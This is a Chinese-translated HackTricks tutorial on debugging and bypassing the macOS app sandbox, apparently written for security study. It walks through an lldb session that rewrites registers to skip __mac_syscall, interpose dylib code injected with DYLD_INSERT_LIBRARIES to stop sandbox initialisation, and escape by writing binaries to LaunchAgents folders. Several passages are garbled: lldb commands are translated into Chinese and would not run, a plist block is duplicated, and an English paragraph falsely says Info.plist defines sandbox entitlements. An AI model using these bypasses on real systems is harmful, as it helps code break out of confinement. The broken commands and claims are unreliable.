| .. | ||
| macos-office-sandbox-bypasses.md | ||
| README.md | ||
macOS沙箱调试与绕过
☁️ HackTricks云 ☁️ -🐦 推特 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- 你在一家网络安全公司工作吗?你想在HackTricks中看到你的公司广告吗?或者你想获得PEASS的最新版本或下载PDF格式的HackTricks吗?请查看订阅计划!
- 发现我们的独家NFTs收藏品The PEASS Family
- 获取官方PEASS和HackTricks周边产品
- 加入💬 Discord群组或电报群组,或者关注我在Twitter上的🐦@carlospolopm。
- 通过向hacktricks repo 和hacktricks-cloud repo 提交PR来分享你的黑客技巧。
沙箱加载过程
在上图中,可以观察到当运行具有权限**com.apple.security.app-sandbox**的应用程序时,沙箱将如何加载。
编译器将/usr/lib/libSystem.B.dylib链接到二进制文件。
然后,libSystem.B将调用其他几个函数,直到xpc_pipe_routine将应用程序的权限发送给securityd。Securityd检查进程是否应该被隔离在沙箱中,如果是,则将被隔离。
最后,通过调用**__sandbox_ms激活沙箱,该函数将调用__mac_syscall**。
可能的绕过方法
{% hint style="warning" %} 请注意,由沙箱进程创建的文件会附加隔离属性,以防止沙箱逃逸。 {% endhint %}
在没有沙箱的情况下运行二进制文件
如果从一个有沙箱的二进制文件中运行一个不会被沙箱化的二进制文件,它将在父进程的沙箱中运行。
使用lldb调试和绕过沙箱
让我们编译一个应该被沙箱化的应用程序:
{% tabs %} {% tab title="sand.c" %}
#include <stdlib.h>
int main() {
system("cat ~/Desktop/del.txt");
}
{% tab title="entitlements.xml" %}
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>com.apple.security.app-sandbox</key>
<true/>
<key>com.apple.security.network.client</key>
<true/>
<key>com.apple.security.files.user-selected.read-write</key>
<true/>
<key>com.apple.security.files.user-selected.read-only</key>
<true/>
<key>com.apple.security.files.all</key>
<true/>
<key>com.apple.security.print</key>
<true/>
<key>com.apple.security.temporary-exception.apple-events</key>
<array>
<string>com.apple.dt.Xcode</string>
</array>
</dict>
</plist>
This is an example entitlements.xml file that specifies the entitlements for a macOS sandboxed application. Entitlements define the privileges and resources that an application can access.
In this example, the following entitlements are specified:
com.apple.security.app-sandbox: Enables the application to run in a sandbox environment.com.apple.security.network.client: Allows the application to make network connections.com.apple.security.files.user-selected.read-write: Grants read and write access to files selected by the user.com.apple.security.files.user-selected.read-only: Grants read-only access to files selected by the user.com.apple.security.files.all: Grants access to all files.com.apple.security.print: Allows the application to print.com.apple.security.temporary-exception.apple-events: Specifies temporary exceptions for Apple events. In this case, the exception is granted to thecom.apple.dt.Xcodeprocess.
These entitlements can be customized based on the specific requirements of the application.
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> <plist version="1.0">
<dict>
<key>com.apple.security.app-sandbox</key>
<true/>
</dict>
</plist>
{% tab title="Info.plist" %}
Info.plist
The Info.plist file is an essential component of a macOS application's bundle. It contains metadata about the application, including its name, version, and supported capabilities. In the context of macOS sandboxing, the Info.plist file is used to define the sandbox entitlements and restrictions for the application.
To debug or bypass the macOS sandbox, it is necessary to modify the Info.plist file to remove or weaken the sandbox restrictions. This can be achieved by editing the file directly or by using tools like plutil to modify the file programmatically.
When modifying the Info.plist file, it is important to understand the implications and potential security risks. Weakening or removing sandbox restrictions can expose the application to unauthorized access or privilege escalation.
To prevent unauthorized modifications to the Info.plist file, it is recommended to implement proper code signing and entitlements verification mechanisms. This ensures that only trusted modifications are allowed and prevents potential sandbox bypasses.
{% endtab %}
<plist version="1.0">
<dict>
<key>CFBundleIdentifier</key>
<string>xyz.hacktricks.sandbox</string>
<key>CFBundleName</key>
<string>Sandbox</string>
</dict>
</plist>
{% endtab %} {% endtabs %}
然后编译应用程序:
{% code overflow="wrap" %}
# Compile it
gcc -Xlinker -sectcreate -Xlinker __TEXT -Xlinker __info_plist -Xlinker Info.plist sand.c -o sand
# Create a certificate for "Code Signing"
# Apply the entitlements via signing
codesign -s <cert-name> --entitlements entitlements.xml sand
{% endcode %}
{% hint style="danger" %}
该应用程序将尝试读取文件**~/Desktop/del.txt,而沙盒不允许**这样做。
在那里创建一个文件,一旦绕过沙盒,它就能够读取它:
echo "Sandbox Bypassed" > ~/Desktop/del.txt
{% endhint %}
让我们调试应用程序,查看沙盒何时加载:
# Load app in debugging
lldb ./sand
# Set breakpoint in xpc_pipe_routine
(lldb) b xpc_pipe_routine
# run
(lldb) r
# This breakpoint is reached by different functionalities
# Check in the backtrace is it was de sandbox one the one that reached it
# We are looking for the one libsecinit from libSystem.B, like the following one:
(lldb) bt
* thread #1, queue = 'com.apple.main-thread', stop reason = breakpoint 1.1
* frame #0: 0x00000001873d4178 libxpc.dylib`xpc_pipe_routine
frame #1: 0x000000019300cf80 libsystem_secinit.dylib`_libsecinit_appsandbox + 584
frame #2: 0x00000001874199c4 libsystem_trace.dylib`_os_activity_initiate_impl + 64
frame #3: 0x000000019300cce4 libsystem_secinit.dylib`_libsecinit_initializer + 80
frame #4: 0x0000000193023694 libSystem.B.dylib`libSystem_initializer + 272
# To avoid lldb cutting info
(lldb) settings set target.max-string-summary-length 10000
# The message is in the 2 arg of the xpc_pipe_routine function, get it with:
(lldb) p (char *) xpc_copy_description($x1)
(char *) $0 = 0x000000010100a400 "<dictionary: 0x6000026001e0> { count = 5, transaction: 0, voucher = 0x0, contents =\n\t\"SECINITD_REGISTRATION_MESSAGE_SHORT_NAME_KEY\" => <string: 0x600000c00d80> { length = 4, contents = \"sand\" }\n\t\"SECINITD_REGISTRATION_MESSAGE_IMAGE_PATHS_ARRAY_KEY\" => <array: 0x600000c00120> { count = 42, capacity = 64, contents =\n\t\t0: <string: 0x600000c000c0> { length = 14, contents = \"/tmp/lala/sand\" }\n\t\t1: <string: 0x600000c001e0> { length = 22, contents = \"/private/tmp/lala/sand\" }\n\t\t2: <string: 0x600000c000f0> { length = 26, contents = \"/usr/lib/libSystem.B.dylib\" }\n\t\t3: <string: 0x600000c00180> { length = 30, contents = \"/usr/lib/system/libcache.dylib\" }\n\t\t4: <string: 0x600000c00060> { length = 37, contents = \"/usr/lib/system/libcommonCrypto.dylib\" }\n\t\t5: <string: 0x600000c001b0> { length = 36, contents = \"/usr/lib/system/libcompiler_rt.dylib\" }\n\t\t6: <string: 0x600000c00330> { length = 33, contents = \"/usr/lib/system/libcopyfile.dylib\" }\n\t\t7: <string: 0x600000c00210> { length = 35, contents = \"/usr/lib/system/libcorecry"...
# The 3 arg is the address were the XPC response will be stored
(lldb) register read x2
x2 = 0x000000016fdfd660
# Move until the end of the function
(lldb) finish
# Read the response
## Check the address of the sandbox container in SECINITD_REPLY_MESSAGE_CONTAINER_ROOT_PATH_KEY
(lldb) memory read -f p 0x000000016fdfd660 -c 1
0x16fdfd660: 0x0000600003d04000
(lldb) p (char *) xpc_copy_description(0x0000600003d04000)
(char *) $4 = 0x0000000100204280 "<dictionary: 0x600003d04000> { count = 7, transaction: 0, voucher = 0x0, contents =\n\t\"SECINITD_REPLY_MESSAGE_CONTAINER_ID_KEY\" => <string: 0x600000c04d50> { length = 22, contents = \"xyz.hacktricks.sandbox\" }\n\t\"SECINITD_REPLY_MESSAGE_QTN_PROC_FLAGS_KEY\" => <uint64: 0xaabe660cef067137>: 2\n\t\"SECINITD_REPLY_MESSAGE_CONTAINER_ROOT_PATH_KEY\" => <string: 0x600000c04e10> { length = 65, contents = \"/Users/carlospolop/Library/Containers/xyz.hacktricks.sandbox/Data\" }\n\t\"SECINITD_REPLY_MESSAGE_SANDBOX_PROFILE_DATA_KEY\" => <data: 0x600001704100>: { length = 19027 bytes, contents = 0x0000f000ba0100000000070000001e00350167034d03c203... }\n\t\"SECINITD_REPLY_MESSAGE_VERSION_NUMBER_KEY\" => <int64: 0xaa3e660cef06712f>: 1\n\t\"SECINITD_MESSAGE_TYPE_KEY\" => <uint64: 0xaabe660cef067137>: 2\n\t\"SECINITD_REPLY_FAILURE_CODE\" => <uint64: 0xaabe660cef067127>: 0\n}"
# To bypass the sandbox we need to skip the call to __mac_syscall
# Lets put a breakpoint in __mac_syscall when x1 is 0 (this is the code to enable the sandbox)
(lldb) breakpoint set --name __mac_syscall --condition '($x1 == 0)'
(lldb) c
# The 1 arg is the name of the policy, in this case "Sandbox"
(lldb) memory read -f s $x0
0x19300eb22: "Sandbox"
#
# BYPASS
#
# Due to the previous bp, the process will be stopped in:
Process 2517 stopped
* thread #1, queue = 'com.apple.main-thread', stop reason = breakpoint 1.1
frame #0: 0x0000000187659900 libsystem_kernel.dylib`__mac_syscall
libsystem_kernel.dylib`:
-> 0x187659900 <+0>: mov x16, #0x17d
0x187659904 <+4>: svc #0x80
0x187659908 <+8>: b.lo 0x187659928 ; <+40>
0x18765990c <+12>: pacibsp
# 通过修改一些寄存器来绕过跳转到b.lo地址
(lldb) 断点删除 1 # 移除断点
(lldb) 寄存器写入 $pc 0x187659928 # b.lo地址
(lldb) 寄存器写入 $x0 0x00
(lldb) 寄存器写入 $x1 0x00
(lldb) 寄存器写入 $x16 0x17d
(lldb) c
进程 2517 恢复执行
沙盒绕过成功!
进程 2517 以状态 0 (0x00000000) 退出
{% hint style="warning" %}
**即使绕过了沙盒,TCC** 也会询问用户是否允许进程从桌面读取文件
{% endhint %}
### 滥用其他进程
如果从沙盒进程中能够**入侵其他运行在较少限制沙盒中(或没有沙盒)的进程**,则可以逃脱到它们的沙盒中:
{% content-ref url="../../../macos-proces-abuse/" %}
[macos-proces-abuse](../../../macos-proces-abuse/)
{% endcontent-ref %}
### Interpost绕过
有关**Interpost**的更多信息,请查看:
{% content-ref url="../../../mac-os-architecture/macos-function-hooking.md" %}
[macos-function-hooking.md](../../../mac-os-architecture/macos-function-hooking.md)
{% endcontent-ref %}
#### Interpost `_libsecinit_initializer`以防止沙盒
```c
// gcc -dynamiclib interpose.c -o interpose.dylib
#include <stdio.h>
void _libsecinit_initializer(void);
void overriden__libsecinit_initializer(void) {
printf("_libsecinit_initializer called\n");
}
__attribute__((used, section("__DATA,__interpose"))) static struct {
void (*overriden__libsecinit_initializer)(void);
void (*_libsecinit_initializer)(void);
}
_libsecinit_initializer_interpose = {overriden__libsecinit_initializer, _libsecinit_initializer};
DYLD_INSERT_LIBRARIES=./interpose.dylib ./sand
_libsecinit_initializer called
Sandbox Bypassed!
拦截 __mac_syscall 以防止沙盒
{% code title="interpose.c" %}
// gcc -dynamiclib interpose.c -o interpose.dylib
#include <stdio.h>
#include <string.h>
// Forward Declaration
int __mac_syscall(const char *_policyname, int _call, void *_arg);
// Replacement function
int my_mac_syscall(const char *_policyname, int _call, void *_arg) {
printf("__mac_syscall invoked. Policy: %s, Call: %d\n", _policyname, _call);
if (strcmp(_policyname, "Sandbox") == 0 && _call == 0) {
printf("Bypassing Sandbox initiation.\n");
return 0; // pretend we did the job without actually calling __mac_syscall
}
// Call the original function for other cases
return __mac_syscall(_policyname, _call, _arg);
}
// Interpose Definition
struct interpose_sym {
const void *replacement;
const void *original;
};
// Interpose __mac_syscall with my_mac_syscall
__attribute__((used)) static const struct interpose_sym interposers[] __attribute__((section("__DATA, __interpose"))) = {
{ (const void *)my_mac_syscall, (const void *)__mac_syscall },
};
{% endcode %}
DYLD_INSERT_LIBRARIES=./interpose.dylib ./sand
__mac_syscall invoked. Policy: Sandbox, Call: 2
__mac_syscall invoked. Policy: Sandbox, Call: 2
__mac_syscall invoked. Policy: Sandbox, Call: 0
Bypassing Sandbox initiation.
__mac_syscall invoked. Policy: Quarantine, Call: 87
__mac_syscall invoked. Policy: Sandbox, Call: 4
Sandbox Bypassed!
静态编译和动态链接
这项研究发现了两种绕过沙盒的方法。因为沙盒是在用户空间加载libSystem库时应用的。如果一个二进制文件能够避免加载它,它就不会被沙盒化:
- 如果二进制文件是完全静态编译的,它可以避免加载该库。
- 如果二进制文件不需要加载任何库(因为链接器也在libSystem中),它就不需要加载libSystem。
Shellcode
请注意,即使是ARM64的shellcode也需要链接到libSystem.dylib中:
ld -o shell shell.o -macosx_version_min 13.0
ld: dynamic executables or dylibs must link with libSystem.dylib for architecture arm64
权限
请注意,即使某些操作在应用程序具有特定权限的情况下可能被允许在沙盒中执行,例如:
(when (entitlement "com.apple.security.network.client")
(allow network-outbound (remote ip))
(allow mach-lookup
(global-name "com.apple.airportd")
(global-name "com.apple.cfnetwork.AuthBrokerAgent")
(global-name "com.apple.cfnetwork.cfnetworkagent")
[...]
滥用自动启动位置
如果一个受沙盒限制的进程可以在一个稍后将要运行非沙盒应用程序的二进制文件的位置写入,它将能够通过将二进制文件放置在那里来逃脱。这种位置的一个很好的例子是~/Library/LaunchAgents或/System/Library/LaunchDaemons。
为此,您可能需要2个步骤:使一个具有更宽松的沙盒(file-read*,file-write*)的进程执行您的代码,该代码实际上会写入一个将被非沙盒执行的位置。
请查看有关自动启动位置的页面:
{% content-ref url="../../../../macos-auto-start-locations.md" %} macos-auto-start-locations.md {% endcontent-ref %}
参考资料
- http://newosxbook.com/files/HITSB.pdf
- https://saagarjha.com/blog/2020/05/20/mac-app-store-sandbox-escape/
- https://www.youtube.com/watch?v=mG715HcDgO8
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- 您在网络安全公司工作吗?您想在HackTricks中看到您的公司广告吗?或者您想要访问PEASS的最新版本或下载PDF格式的HackTricks吗?请查看订阅计划!
- 发现我们的独家NFTs收藏品The PEASS Family
- 获取官方PEASS和HackTricks衣物
- 加入💬 Discord群组或电报群组,或在Twitter上关注我🐦@carlospolopm。
- 通过向hacktricks repo 和hacktricks-cloud repo 提交PR来分享您的黑客技巧。